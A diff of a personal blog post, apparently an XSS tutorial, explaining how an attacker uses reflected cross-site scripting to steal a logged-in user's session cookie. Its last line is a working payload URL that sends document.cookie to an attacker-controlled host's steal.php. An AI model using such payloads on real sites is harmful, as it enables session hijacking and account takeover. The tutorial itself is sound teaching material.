numanaytemiz/numanaytemiz.github.io/_posts/2023-10-15-anatomy-of-xss.md

 - **Initiating an exploitation phase against browser plugins first and then the machine**
 - **Perfom keylogging**

-#### Stealing Cokkie With XSS Sample
+## **Stealing Cokkie With XSS Sample**

 **Lets assume that the ultimate goal of an hacker is to run JavaScript to steal a sesion cookie of a user John Doe who is authenticated into web site site2.com**\
 **The first thing the hacker tries to do is to find an XSSvulnerability affecting website**\
-**Once an XS is located , attacker will have to build up a payload, create link and sent it to victim inviting the same to click on it.
+**Once an XSS is located , attacker will have to build up a payload, create link and sent it to victim inviting the same to click on it.
 (This is called refleccted xss)**

 `http://site2.com/vulnerablexss.php?name=<script>var i=new Image(); i.src="http://site1.com/steal.php?q="%2bdocument.cookie;</script>`